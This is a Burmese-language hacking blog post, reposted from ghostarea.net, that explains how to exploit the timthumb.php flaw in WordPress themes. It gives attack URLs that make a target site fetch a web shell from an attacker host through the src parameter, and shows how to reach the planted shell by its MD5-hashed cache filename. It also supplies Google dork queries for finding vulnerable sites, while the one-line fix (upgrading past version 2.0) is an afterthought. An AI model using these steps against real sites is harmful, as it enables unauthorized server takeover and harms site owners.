WP ရဲ ႔ Zero Day ဆိုျပီး အြန္လိုင္းမွာ အုပ္ေအာ္ ေသာင္းနင္းျဖစ္သြားတဲ့ Plugin ေလးအေၾကာင္း နည္းနည္းေျပာရေအာင္..။
ဒီ Hacking Tech: က ေပၚလာတာ လပိုင္းပဲရွိေသးတယ္ဗ် ျမန္မာျပည္မွာေတာင္ လူသိပ္မသိလွေသးဘူး..။ လက္ခ်ိဳးေရလို႔ရတယ္ သိတဲ့လူ…။
ေပါက္သြားတဲ့ Plugin ကေတာ့ timthumb.php ပါ timthumb ဟာ Photo ေတြကို ခ်ံဳ ႔ ခ်ဲ ႔လုပ္ရာမွာ အလြန္အသံုး၀င္တဲ့ Plugin တစ္ခုျဖစ္ပါတယ္ ဒါ့အျပင္ သူဟာ တျခား URL ကေန Photo ေတြကိုပါ လွမ္းယူႏိုင္ပါေသးတယ္ ဒီေနရာမွာေပါက္တာပါပဲ သူက တျခားလင့္ခ္
ေနရာက ပံုေတြယူမယ္ဆိုရင္ www.target.com/…/timthumb.php?src=www.photosite.com/photo.php ဆိုျပီး သြားသဗ် အဲ့ဒီ့ src= ေနာက္မွာ Shell Link ကိုသြားထည့္လိုက္မယ္ဗ် ကဲ www.target.com/…/timthumb.php?src=www.hacker.com/shell.php
ေပါ့ ဒါဆိုလည္းသူက Shell ၾကီးကို Upload ၾကိတ္သြားမွာပဲ အဲ့ဒီ့အခါက် ကၽြန္ေတာ္တို႔က ေအးေအးေဆးေဆးသြား ေကာက္သံုးရံုပဲ အဲ့ဒီ့ Shell Link ကို ဘယ္လို ယူရမလဲဆိုေတာ့ shell.php Link ကို MD5 Change ခ်ရမယ္ဗ် www.hacker.com/shell.php ဆိုရင္
3434FF35A3614422F97F13251661A890 ေပါ့ဗ်ာ
အင္း ဒါဆို www.target.com/…/cach/src=3434FF35A3614422F97F13251661A890.php ကိုသြားၾကည့္လိုက္ရင္ ကၽြန္ေတာ္တို႔ တင္ထားတဲ့ SHell ၾကီးတင္လာပါမယ္ ကဲ ေပ်ာ္စရာၾကီးေနာ္
သူက Theme က Plugin မွာ ေပါက္တဲ့အတြက္ thumb ရွိရာ Directory ကိုသြားရာမွာ Theme ေပၚမူတည္ျပီးသြားရပါ့မယ္ ဥပမာ www.target.com ရဲ ႔ Theme ဟာ Fordreporter က ဆြဲရင္ fordreporter/scripts/thumb.php နဲ႔သြားရပါ့မယ္
ဥပမာ www.target.com/fordreporter/scripts/thumb.php ေပါ့ဗ်ာ Upload လုပ္ခ်င္ရင္ www.target.com/fordreporter/scripts/thumb.php?src=www.hacker.com/shell.php Shell ကိုသြားၾကည့္ရင္ www.target.com/fordreporter/scripts/cache/src=3434FF35A3614422F97F13251661A890.php
ဆိုျပီးသြားရပါ့မယ္
Dork ရွာရင္လည္း ထိုနည္းလည္းေကာင္းပါပဲ Theme ေပၚမူတည္ျပီး inurl သို႔ allinurl နဲ႔တြဲျပီး inurl:fordreporter/scripts/thumb.php ဆိုျပီးရွာရပါ့မယ္
ဒီလို Theme နဲ႔ Thumbe Directory ကိုတြဲျပီး ရွာဖို႔ကိုေတာ့ ဒီမွာ သြားၾကည့္ပါ
ေအာ္ Countermeasure လားလြယ္ပါတယ္ ဒီ Vuln ဟာ thumb 2.0 ေအာက္ကဟာေတြပဲ ေပါက္တာျဖစ္လို႔ ဒီေနရာ ကေန Code ေတြယူျပီး ျပင္လိုက္ပါ
PS : WP မွာ Timthumb ေပါက္မေပါက္စစ္တဲ့ Plugin ရွိပါတယ္
post by ghostarea.net
copy by Me ..........he...he
